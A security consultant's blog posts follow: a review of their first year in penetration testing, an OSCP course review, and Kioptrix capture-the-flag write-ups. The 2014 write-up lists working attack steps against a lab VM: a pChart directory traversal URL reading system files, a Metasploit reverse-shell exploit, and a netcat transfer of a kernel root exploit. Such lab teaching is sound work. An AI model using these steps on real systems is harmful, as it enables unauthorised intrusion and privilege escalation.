A Review of my past one-year in Information Security

A review of my past one-year in Information Security
A review of my past one-year in Information Security

Last week, I had my one-year anniversary in the Information Security industry, doing work related to the offensive aspect of security. Surprisingly, it has already been a year since I left my previous role from a local bank and pursued my interest in Information Security. Time really flies…

The purpose of this blog is to document my learning journey, but I have neglected it for a few months due to hectic workload from various sources, however, the good news is that I have decided to consciously remind myself to update it more often moving forward! Well, make it a “new year resolution”!

Now, back to the review…

Work

Being part of an awesome team at Vantage Point Security, I have been given the opportunity to perform technical security assessment on various organisations in Singapore as a qualified Security Consultant. I was privileged to perform manual security penetration testing on various types of web and mobile applications that belongs to renowned organisations, such as some of the best financial institutions and telecommunication companies in the region.

Something interesting is that I am usually a customer of my clients, which makes me really appreciate it when I see them taking security seriously and strive to improve for the better. Overall, I find it very meaningful to be part of this ecosystem in making products better and safer for people – it makes me appreciate the things I am doing and keep me going!

A special shout-out to my mentor, Paul Craig, Sven Schleier, Jin Kun and Ryan Teoh for making my past one-year such an awesome journey of learning! I have learnt so much from them. It is always great to be able to work alongside people who are motivated and passionate about security. I am looking forward to doing even greater stuff together in the year ahead!

Always ready to give a high-five to fellow security enthusiasts!
Always ready to give a high-five to fellow security enthusiasts!

Certifications

I have managed to achieve the very first milestone of most penetration testers, Offensive Security Certified Professional (OSCP), after having completed 3-months of intensive lab hands-on practices in its recommended course, Penetration Testing with Kali (PWK). I have also written a blog post about my experience gained during the 3-months period, in hope that it will be helpful to fellow like-minded aspiring security enthusiasts. If you are interested, please check out My OSCP / PWK Course Review.

Besides OSCP, I have also gotten myself the following certifications in the past one-year:

“CREST is a not for profit organisation that serves the needs of a technical information security marketplace that requires the services of a regulated professional services industry.” ~ directly quoted from CREST

From my observations, I see that CREST has been very successful in becoming the go-to quality assurance organisations in Singapore when it comes to selecting vendors to work with, be it the government agencies, financial institutions or organisations from other industries. Something I like about them is that they are conducting proctored examinations, which can solve a lot of “problems” caused by people with no ethics value. It is a huge problem occurring around the world, which I am not going to cover in this post – maybe next time (I got to stay on track!).

To me, certification is one of the many forms of (technical) quality assurance that a consultant can provide to their clients before engaging them on any security assessment projects. While being certified is a good thing, quality is always better than quantity. It is essential to put the skills you learnt into practice, or it will be just another piece of paper.

If you don't put your skills into practice, it will just be another piece of paper
If you don’t put your skills into practice, it will just be another piece of paper

Bug Hunting

My experiences in bug hunting have been some of the most devastating yet delightful moment of my past one-year. When I learnt about the existence of “Bug Bounty Program” (e.g. Bugcrowd and HackerOne), I was both surprised and excited, thinking how it could be fun to be able to find bugs on the internet and get rewarded for it. It sounded really enticing at first, especially with the thoughts that since I have been testing web and mobile applications to earn a living, it should be easy for me. However, it doesn’t take long for me to realise how naive I was to even think that way – we are talking about the internet, man! Any low hanging fruits would have already been discovered by someone else, there is nothing left lying around for me to “hunt”.

Well, I thought it would be easy, but...
Well, I thought it would be easy, but…

On a positive note, this simple realisation has motivated me to keep up my pace in learning all kinds of “new stuff” that are happening in the internet, such as to research on the security mechanisms and implementation of various popular web applications, development frameworks, content management systems, penetration testing techniques such as bypassing a Web Application Firewall (WAF) etc. and many more interesting stuffs.

Nowadays, I still do bug hunting whenever I get some free time before I turn in for the night, or during some random weekends. Did you noticed that I call it “Bug Hunting” instead of “Bug Bounty”? That is because I don’t only focus on programs that give monetary rewards to security researchers. I work on any programs that I find it meaningful and reasonable to test, such as companies that I personally use their products or companies that give a clearly defined scope on their Responsible Disclosure or Bug Bounty Programs.

Just playing my part in making the world a better place
Just playing my part in making the world a better place

While it may sound cheesy to say that I want to make the world and the internet a safer place for everyone, sometimes people just want to do things that they themselves feel is meaningful, worthwhile, and can make themselves feel good. Personally, to find bugs, disclose them responsibly to the vendor and getting them fixed, is something that makes me feel that way.

I am still learning and trying to get better every day. I urge all aspiring bug hunters to create a Twitter account and start following fellow bug hunters and learn from one another. As mentioned earlier, I will start posting more write-ups in my next one-year, so stay tuned! Besides reading the write-ups from fellow bug hunters, I also recommend reading the publicly disclosed bugs from sources such as the HackerOne Hacktivity or other unofficial sources such as this and this. One of the best bug bounty tips that I have come across so far is to keep trying, keep learning, and never give up.

Keep learning, and never give up.
Keep learning, and never give up.

I have had my fair share of achievement over the past one-year and I feel really honored to be recognized by the 10 following organisations and have myself enlisted on their Security Researcher Hall of Fame:

While I cannot disclose the details of the vulnerabilities that I have discovered, I might write a blog post next time on some of them – with all information masked, of course.

Official recognition from Netflix
Official recognition from Netflix

Security Research

Life is full of challenges, it is how you responded to them that makes a difference to your life ~ Source

We security folks always challenge ourselves in many things – some people challenge themselves to earn 50k in slightly over 1 month, some people challenge themselves to earn 30k in 30 days – we all like to set milestones and work towards it. For me, I am not at their level yet, but one-year ago, I told myself that I want to find a zero-day too. It seems impossible at first, but I was inspired by one of my colleague, Bernhard Mueller, during one of the project engagement that we did together and made me felt that I can do it too. The influence is real. I would download the same software or application development framework  and look for zero-days; this is something that I will not do in the past. He have also written and article about why you should be looking for zero-day vulnerabilities during penetration testing. As time goes by, it has become a habit for me to look for zero-days during penetration testing engagement as well.

Recognition from TIBCO for CVE-2017-5528
Recognition from TIBCO for CVE-2017-5528

Of course, it is easier said than done. Most of these commercial and/or open source software were already being thoroughly tested prior to their releases, so it is very difficult to find any legitimate bugs in them. I have gone through my fair share of hardships, gained tons of knowledge along the way as I constantly failed and was ultimately lucky to have found a few zero-day vulnerabilities on some commercial products used by large enterprises.

It is worth mentioning that TIBCO is an organisation that values security. They take security report seriously and replies promptly to security researchers. It was great communicating with them.

  • CVE-2017-8042 – Pivotal – Stored Cross-site scripting (XSS) vulnerability in Spring Batch Admin before 1.3.0
  • CVE-2017-8043 – Pivotal – Cross-site request forgery (CSRF) vulnerability in the Spring Batch Admin before 1.3.0

Both of the above issues were reported in March 2017 and has been confirmed by Pivotal that they will not be addressing them as the software is going to reach End-Of-Life (EOL) by the end of 2017. The recommendation is for users to migrate to another product, Data Flow. They have recently put up a notice too.

Currently, both CVE trackers are pending Pivotal to publish them online, they have not confirmed a date yet.

While they were not high-severity vulnerabilities that could lead to Remote Code Execution (RCE), they were good enough of a start for me. They were genuine bugs on the software, undiscovered and hence left exploitable by malicious attackers, and my research/report did helped the software company to improve their products, which are used by many enterprises all over the world.

Good enough, but try harder next time, don't be contented. It's on a start.
Good enough, but try harder next time, don’t be contented. It’s only a start.

Next up is an interesting bug that I found while working on one of the private BB program. They are using the PRTG Network Monitor, which is an application that help organisations to monitor their systems, devices, traffic and applications that are using common technologies like SNMP, WMI, SSH, and many more. I shall restrain from providing too much information for now, maybe a write-up after the latest version and release notes has been officially released.

  • CVE-2017-????? – Paessler AG – pending security patch and release notes
Photo of myself at the Cybersecurity Camp @ Singapore 2017
Photo of myself at the Cybersecurity Camp @ Singapore 2017 – Source

Lastly, I attended the Cybersecurity Camp @ Singapore 2017 which was organised by the Singapore Cybersecurity Consortium (SGCSC) earlier this year and learnt about fuzz testing for finding vulnerabilities. Having equipped with this knowledge and its theoretical understanding for a few months, I finally put them into practice after being encouraged by Jin Kun as he shared his own success story of having discovered many zero-day vulnerabilities through fuzzing.

Being inspired and motivated to do my own fuzzing as well, I learnt many things along the way, specific to how to fuzz an application efficiently, how to fuzz an application library, how to optimize my virtual machines processes for better performances, how to fine-tune my fuzzer, how does different fuzzers mutate or identify different paths within an application flow, how to compile binaries using different compilers and buildsystem, how to analyse a crash, and many more interesting stuff that I never thought I would learn. After some time of fuzzing, I have discovered 3 CVEs on BinChunker, the issues has been fixed and changes are being pushed to various Linux distros as I am writing this blog post.

There will be a short write-up on this soon.

While BinChunker is not a very popular tool based on Debian popularity contest statistics and there was no RCE exploit developed for the discovered vulnerabilities, it was very satisfying. I really enjoyed the experience from discovering these vulnerabilities to reporting them and eventually getting them fixed. It’s great to see how people react and appreciate the findings you discovered and then work together to fix the problem as a team. Information Security is a super awesome community where people help one another to make things better!

Community Projects

Have you checked out the OWASP Mobile Security Testing Guide (MSTG) already? If you have not, then you probably should.

The MSTG is a comprehensive manual for mobile application security testing and reverse engineering. It describes the technical processes for verifying the controls listed in the OWASP Mobile Application Verification Standard (MASVS). You can also read it on Gitbook or download it as an e-book.

Main Deliverables of the OWASP Mobile Security Testing Guide
Main Deliverables of the OWASP Mobile Security Testing Guide

I was fortunate to work alongside the project leaders of MSTG at work and since I know nothing about mobile application security testing back then, I was highly encouraged by Bernhard to use the MSTG as my “study material” and if I find anything missing, I can research on them separately and contribute to this community project by submitting a Pull request. Well, it makes sense – since I am going to research on those things to learn anyway, why not share the knowledge with the community and help fellow aspiring security enthusiast in their learning as well?

With consistent contribution of quality content for a few months, I am humbled to be acknowledged as one of the “Top Contributor” for the OWASP MSTG project. If you are someone whom is interested in mobile application security, I highly encourage you to read through the content and create a pull request if you find anything missing. Once you start submitting those pull requests, they can become quite addictive.

Academic

This is the last section of the review. Some of my friends know that I am currently a part-time student enrolled in Master of Computing (Infocomm Security) at National University of Singapore (NUS). My first semester was hectic, having not been studying academic syllabus since graduated in 2014, however, things went well thanks to the support of family and friends (special shout-out to Zhan Teng, Julian Tan and Jiqing for being super awesome teammates!). The second semester is coming to an end soon and of course, with tons of submission deadlines to meet in the next few weeks and a few exams to clear!

Android Booting Process
Android Booting Process

Other things worth mentioning are some of the more interesting homework that I did this semester for one of my module, CS5231 – System Security, taught by Professor Liang Zhenkai. Usually when I root an android device, I use readily available tools and does not have a clear understanding about what really happened under the belly. In order to complete one of the tasks in the homework, I was being forced to step out of my comfort zone and dive into how android really works, how the rooting of android is being performed, what are the various methods to root an android device and eventually also created my own custom Over-The-Air (OTA) package to perform code execution as root; to fire up my own daemon service that can help to spawn a root shell to my client upon request.

Conclusion / To-do for the next year

Without knowing, this blog post has turned out to be a long article. Personally, I find it worthwhile and meaningful to just sit down, think-through and review about what I have done in my past one-year in the industry of Information Security. I feel that everyone should do something similar and then think about what they want to do in the next one-year.

Think about some of the things that you want to achieve in the next one-year
Think about some of the things that you want to achieve in the next one-year

The reason for me to post this article is also to put some pressure on myself and make sure that I achieve the goals which I said that I want to achieve in the next one-year. Next year, I am going to look back at this article and question myself.

In the next one-year, I intend to work on other CREST certifications, such as the CREST Certified Infrastructure Tester (CCT INF) and/or CREST Certified Web Applications Tester (CCT APP). Like I mentioned above as well, I like how they are conducting proctored examinations here in Singapore and I find that they can be great milestones to challenge myself in the next one-year.

Another certification which I am looking forward to challenge myself with is the Offensive Security Certified Expert (OSCE), which I intend to sign up for its course, Cracking the Perimeter (CTP), in the next few months. I need to try harder! #TryHarder

I got to try harder!
I got to try harder!

In view of the OSCE certification goal, I hope to focus more on low-level stuff, such as to improve my exploitation techniques, exploit development skills, etc., which are things that I don’t have much experience with now, but are useful skills which I am very keen to pick up.

In the next one-year, I hope to continue to hunt for bugs and keep up with the learning. I also aim to post write-ups on any interesting bugs, if I am given the permission to do so.

Other things are write-up on CTF labs such as the Bandit from OverTheWire and practice machines such as Kioptrix from Vulnhub.

For work, apart from Web Application and Mobile Application penetration testing, I hope that I can have opportunities to gain more exposure across the Asia region and get myself involved in different types of engagements, such as ATM Hacking, Red Teaming and Wireless Hacking. There are so many things to learn, I can’t wait anymore!

I need to be more productive...
I need to be more productive…

I also aim to develop my own Burp Extender module that can help to improve my productivity. At least my first extender module should not be too complicated, I just need to get started with something, start small, gain the knowledge and momentum before targeting something more complicated. If you have any interesting ideas that are not too complicated, please share in the comments section.

Lastly, as part of my Master course requirements, I need to complete a one-semester long research project (3-months duration). I can choose between an academic project proposed by one of the NUS professor, or an industrial project proposed by a company in the industry. I have not chosen any topics yet, but I hope that I can work on something useful to my field of work, to not only clear my course requirements, but also allow me to learn practical techniques and knowledge that are relevant to my area of interest. That way, I will have enough interest to continue to work on it after the 3-months duration. If there is any potential projects related to offensive side of security and not too complicated/simple, I would love to know it.

If you have read this entire post, you deserve a medal, just like this camera man
If you have read this entire post, you deserve a medal, just like this camera man

I hope that the next one-year will be even better and full of learning opportunities for me! Till I blog again.

Advertisements

My OSCP / PWK Course Review

It have been a tough 3 months of virtual lab and hands-on training – so much learning, and I mean, intensive learning; combo with many sleepless nights and so much sweat and tears (maybe not the tears part but you get the point), I have finally passed my OSCP!

I am now officially an Offensive Security Certified Professional!  Yes, I tried harder #tryharder 🙂

passoscp

It have been a very tough 3 months of journey, which explains why I have not been blogging anything at all since then. I am happy to be back and blogging once again!

Okay, here comes my review about the course, specifically for any fellow aspiring ethical hacker like me, or simply anyone who have passion in the topic of computer security and wants to learn the technical side of the skill set.

A little bit about myself (for reference to the content below): I graduated from the National University of Singapore (NUS), School of Computing, Bachelor of E-Commerce, in 2014. Since then, I have been working as an IT Infrastructure Project Delivery Manager at a bank. In my role, I basically coordinates the completion of various deliverable for either the upgrading of existing systems or setting up of new systems. Up to this point, my job were not security related. To pursue my interest in information security, I left my job. I took up training courses and obtained my EC-Council Certified Ethical Hacker (CEHv9) certification during September 2016. Ever since then, I have been doing a lot of self learning on IT security stuff, especially from trying out hands on self-training by hacking the Virtual Machines downloadable from Vulnhub, you can read some of my write-ups over here.

oscp-certs

Before you sign up for the OSCP course, it is essential to plan your time well! I made a mistake so I’d like you to learn from it. First, you have to know that to obtain the OSCP certification, you will need to register yourself for the Penetration Testing with Kali (PWK) course. The course consists of a virtual lab environment of which the credentials will be sent to you (along with training manual and videos) after you have successfully registered for the course. The mistake which I have made is to directly plan for a nice weekend (and a week with lesser work) to sign up for the course, thinking that I could get started immediately.

Listen/read: You will not start the course immediately. Courses will only start at certain days of each week, and each week can only have a limited number of students to start their PWK course, depending on the sign up rates, which will not be disclosed by Offensive Security. For my case, the earliest I could get started back then was 2 weeks after I have signed up for the course. Noticed the mistake here? I totally expected myself to be able to get started right after I signed up!

i_will_try_harder

With the above mistake and poor time management at the start, I spent several days on the PDF lab manual exercises and the training videos. As reference, I started working on the lab machines 2 weeks after my PWK course commenced. Many people would recommend that you jump straight into the lab and not waste any time. I would like to disagree partially. While I believe that you could learn faster jumping into the lab straight, but there are some skill sets which you have to pick up before just jumping in straight.

Personally, I find that you should go through the lab manual on the chapter regarding various methods for file transfer. You should not miss the chapter for buffer overflow too, that is very important, as it teaches you how to craft your own simple fuzzer, shell code and modify the exploit. The fundamental enumeration techniques are very important too, specifically the chapter on using tools like nmap. Essentially, my point is — don’t just jump into the lab unless you know what you are doing. Learn the basics, and then jump in to try out the tools. When things are not right, jump out again. That is the whole point of the lab — for you to practice what you learnt and not just study the theory.

Regarding the learning curve, I must say that it really takes time to get your very first shell and it gets really addictive. Personally, it took me quite awhile to get my first shell even though it is just simply running the Metasploit tool. Don’t know about Metasploit? Fret not, it will be covered in the lab manual. Or you can complete the Metasploit Unleashed Free Ethical Hacking Course, like I did. It was good learning as well and most importantly, it is an Own Time Own Target (OTOT) kind of free online course. Be patient, shell will come, you just need to try harder, don’t give up.

c4rvvpvvcaacekv

Thanks to the advise and encouragement from my mentor (Paul, that’s you), I took up the challenge of hacking Pain as my 10th machine. For those who don’t know what that means — Pain is one of the “boss” machine in the OSCP lab environment, along with his buddies: Sufferance, Humble and Gh0st. Hacking Pain as my 10th machine was no easy task. But like I said, I tried harder, it took my 8 days to root it. No joke, 8 days. Along the way, I learnt a lot of stuff I never imagined myself learning and also never expected myself to be able to understand. Of course, no spoilers, but really, just keep Googling and you will find it, trust me, and trust my mentor. Also thanks to these 8 days of being stuck on a machine, I kind of got used to the suffering (you know the feeling when you have no shells for a long time) and started to really pick up my pace moving forward.

jwevp

While I am not going to spoon feed anyone with any post-enumeration scripts, I must say that you can always write your own scripts, or make use of available resources, there are several very good scripts around, for you to find out. One advise though, don’t just use it blindly. My peers Jin Kun and Ryan Teoh advised me the same when I was using the downloaded scripts happily initially too. There are cases where information are not presented to you directly, or when the operation system are not identical with the scripts target. In those cases, what are you going to do? Are you going to modify your script, do it manually, or give up? We never give up, so we have to understand what the script is doing. If you don’t understand it, don’t use it. Learn. It’s the same as Metasploit exploits — you run it, get shell, yay. Next, you should first, try to understand why that happened and try to get the same result without using Metasploit. The good thing is that in each of the Metasploit modules, you can run the command ‘info’ to read its description and you can read the source code of the modules directly in the “/usr/share/metasploit-framework/modules” directory. Like many people would have also shared with you, for privilege escalation, the only reference notes which you may need are probably just these list for Windows and Linux respectively. Learn and understand them and you are good to go.

pwk-lab-net-intro1

At the end of my lab time, I managed to make my way all the way into the Administrative department (as shown in the image above) and hacked some of the machines in there. During my 3 months of lab time, I managed to root 42 out of [spoiler, not going to tell you] machines. It was not that bad, it is possible, you have to believe in yourself.

Finally, it’s the exams. For those who are not familiar with the exam format, the hands-on exam duration is 23 hours and 45 minutes. There will be several machines for you to attack and get the “flags”. After your time is up, you will be cut off from the exam’s Virtual Private Network (VPN) and you will have to submit a professionally prepared lab report within the next 24 hours. This document should contain the testing process and step-by-step guides on how to replicate the vulnerability and get shell of the highest system privileges.

keep-calm-and-try-harder

I was lucky because there were several components that were very similar to some of the machines which I have rooted previously in the lab. While I cannot specifically share what exactly are the components, I believe I can share that, if you keep working on getting more machines rooted and understand the vulnerabilities that you have exploited to root those machines, trust me — you will recognize it when you see it during the exams. Of course, the exam machines will not be so straight forward, but they will most likely be made up of several vulnerabilities (which you have already seen back then in the lab) being put together, where after exploiting one vulnerability, it leads to the discovery or/and exploitation of the next vulnerability. Again, time management is super important during the exams, you should not get stuck for too long and keep getting stuck in that particular spiral. Move on to the next machine and start enumerating for any attack vectors. Come back again later. Don’t give up. The only reason why the machine is there is because it is hackable, that is the only fact that you should remember during your exams!

To sum up, it was a very fruitful and enriching 3 months of lab time taking the PWK course. Definitely, if time allows, I would love to take up other courses from Offensive Security. A shout out: I am very thankful to my friends at Vantage Point Security, whom never fails to ask me about my progress on the lab machines and listen to my rants and gave me motivational speeches. Special thanks to Paul Craig, Jin Kun and Ryan Teoh, whom constantly gave me constructive advise and encouragement that keeps me going, not forgetting the many ping pong sessions whenever I am having mind blockage. Also thanks my family for supporting me! Lastly, my girlfriend is so awesome, for being so understanding and considerate towards me during my busy 3 months of journey towards getting my OSCP certification.

Good luck to anyone who wish to take up the challenge of becoming an Offensive Security Certified Professional (OSCP)!

Writeup for Kioptrix Virtual Machines from Vulnhub

lvl01_kioptrix_01

I have finally completed the writeup of all 5 Kioptrix Virtual Machines (VMs) from Vulnhub.com, I hope they are helpful to you.

While they are being categorised as “beginner” level challenges, I find them pretty challenging and definitely an effective training for me. I learnt many things through working on these VMs.

For your convenience, the following are the 5 writeups on Kioptrix machines,

Cheerios!

Writeup for Kioptrix: 2014 (#5)

This is the finale post of the kioptrix series writeup.

lvl-5-000

Perform hosts discovery using nmap
> nmap -Pn 192.168.117.0/24 -T5 –version-light

Nmap scan report for 192.168.117.133
Host is up (0.00038s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
8080/tcp open http-proxy
MAC Address: 00:0C:29:BD:C5:DD (VMware)

Only two ports?

Let’s use the directory buster to check if there is any interesting webpages or login form,
> dirb http://192.168.117.133

+ http://192.168.117.133/cgi-bin/ (CODE:403|SIZE:210)
+ http://192.168.117.133/index.html (CODE:200|SIZE:152)
> dirb http://192.168.117.133:8080
+ http://192.168.117.133:8080/cgi-bin/ (CODE:403|SIZE:210)

No luck!

Perform Nikto vulnerability scan on the servers
> nikto -h http://192.168.117.133

– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.117.133
+ Target Hostname: 192.168.117.133
+ Target Port: 80
+ Start Time: 2016-10-27 13:52:44 (GMT8)
—————————————————————————
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sun Mar 30 01:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST

We will look into this again if required. Let’s try to navigate to the web page first.

Navigating to the website hosted on HTTP server port 8080 – it says that I don’t have the permission to access the page.

lvl-5-001

Moving on to the HTTP server port 80, it gives me the default page saying “It Works”.

lvl-5-002

However, the good news is that its source contains something that is not included in the default page.

<META HTTP-EQUIV="refresh" CONTENT="5;URL=pChart2.1.3/index.php">

Let’s try to navigate to the mentioned URL:
> 192.168.117.133/pChart2.1.3/index.php

lvl-5-003

Google for known vulnerabilities

Indeed, check out this website, it basically documented the multiple vulnerabilities which existed in pChart version 2.1.3 – which consists of directory traversal and cross-site scripting.

Perform directory traversal

Using the instructions shown on the website I shared earlier, we can perform directory using the following sample code reference,

“hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd”

In our case, run the exact following line (replace to your target’s IP address, of course)
> http://192.168.117.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin

Directory traversal is working. Remember the page at port 8080, the one which denies me from viewing due to insufficient file permission?

Let’s check out the apache HTTP server settings to see what were its settings and configurations.

Note that this is a FreeBSD server, which means that the config file is located at /usr/local/etc/apache2x/httpd.conf
> http://192.168.117.133/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

Bingo, it works.

lvl-5-004

The following is suspiciously interesting,

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser

It basically means that the results will only be allowed to shown on Mozilla Firefox browser 4.

After some research, I have gotten the user agent information of Mozilla 4,

Mozilla/4.0 (compatible; MSIE 4.01; Windows NT 5.0)

To use it, there are many ways. For me, I uses a Firefox plugin called Quick Preference Button. It has a lot of components with it, but you just have to change the item under Prefs>Spoof>Custom and then enter the above user agent information.

lvl-5-005

Now that you are accessing the web site using Mozilla 4 user agent, you can finally view the page,

lvl-5-006

The phptax web page information looks pretty old school.

lvl-5-007

Did some research, noticed that there are readily available modules in Metasploit to exploit on phptax.
> msfconsole
> search phptax

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
exploit/multi/http/phptax_exec 2012-10-08 excellent PhpTax pfilez Parameter Exec Remote Code Injection

> use exploit/multi/http/phptax_exec
> set rhost 192.168.117.133
> set rport 8080
> exploit

[*] Started reverse TCP double handler on 192.168.117.128:4444
[*] 192.168.117.1338080 – Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo UPBXBAbsRsBHMrXp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo PLFkF52o2dwDMsR3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “UPBXBAbsRsBHMrXp\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “PLFkF52o2dwDMsR3\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.117.128:4444 -> 192.168.117.133:48546) at 2016-10-27 14:51:35 +0800
[*] Command shell session 2 opened (192.168.117.128:4444 -> 192.168.117.133:63426) at 2016-10-27 14:51:35 +0800

> id

uid=80(www) gid=80(www) groups=80(www)

Now we have a limited shell as user www.

Check the kernel version
> uname -a

FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

Search for vulnerability on FreeBSD version 9.0
> Check out FreeBSD 9.0 – Intel SYSRET Kernel Privilege Escalation

Download and host the exploit code on your attacker machine
> nc -lvp 6666 < getr00t.c

Download it using the limited shell at your target machine
> nc -nv 192.168.117.133 6666 > r00t.c

Finally, compile the code
> gcc r00t.c
> ./a.out

[+] SYSRET FUCKUP!!
[+] Start Engine…
[+] Crotz…
[+] Crotz…
[+] Crotz…
[+] Woohoo!!!

> id

uid=0(root) gid=0(wheel) groups=0(wheel)

Congrats, you are now root!

> cd /root
> cat congrats.txt

If you are reading this, it means you got root (or cheated).
Congratulations either way…

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in
mind, and not meant for the seasoned pentester. However this does not mean one
can’t enjoy them.

As with all my VMs, besides getting “root” on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and “hope” it works, but think about the traffic.. the logs… Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks.

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won’t from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren’t in “/var/log/apache/access.log”, but in “/var/log/httpd-access.log”.
It’s default document root is not “/var/www/” but in “/usr/local/www/apache22/data”.
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.

As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed “OSSEC-HIDS” and monitored a few things.
Default settings, nothing fancy but it should’ve logged a few of your attacks. Look
at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn’t support “iNotify”, I couldn’t use OSSEC-HIDS
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should’ve detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.

Be good…

loneferret
http://www.kioptrix.com

p.s.: Keep in mind, for each “web attack” detected by OSSEC-HIDS, by
default it would’ve blocked your IP (both in hosts.allow & Firewall) for
600 seconds. I was nice enough to remove that part 🙂
Here we conclude the Kioptrix CTF series.
Cheers.

And yes, this concludes my Kioptrix series write-up! Cheers.

Writeup for Kioptrix: Level 1.3 (#4)

Once again, a continuation of the Kioptrix series writeup!

First of all, something different about the VM for Kioptrix level 1.3 (#4) is that unlike the rest of the previous VMs, #4 only comes with a Virtual Machine Disk (VMDK) file. As such, you cannot open it normally like what you have done for the past VMs.

Click here to view my step-by-step guide to create a VM using existing VMDK file, which is ideal in this case. 

lvl-4-000

Scan for the VM using nmap
> nmap 192.168.117.100-200 -Pn -T5

Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-26 21:29 SGT
Nmap scan report for 192.168.117.132
Host is up (0.00053s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:7C:1F:EC (VMware)
Scan the web server for possible web pages

Run Directory Buster
> dirb http://192.168.117.132

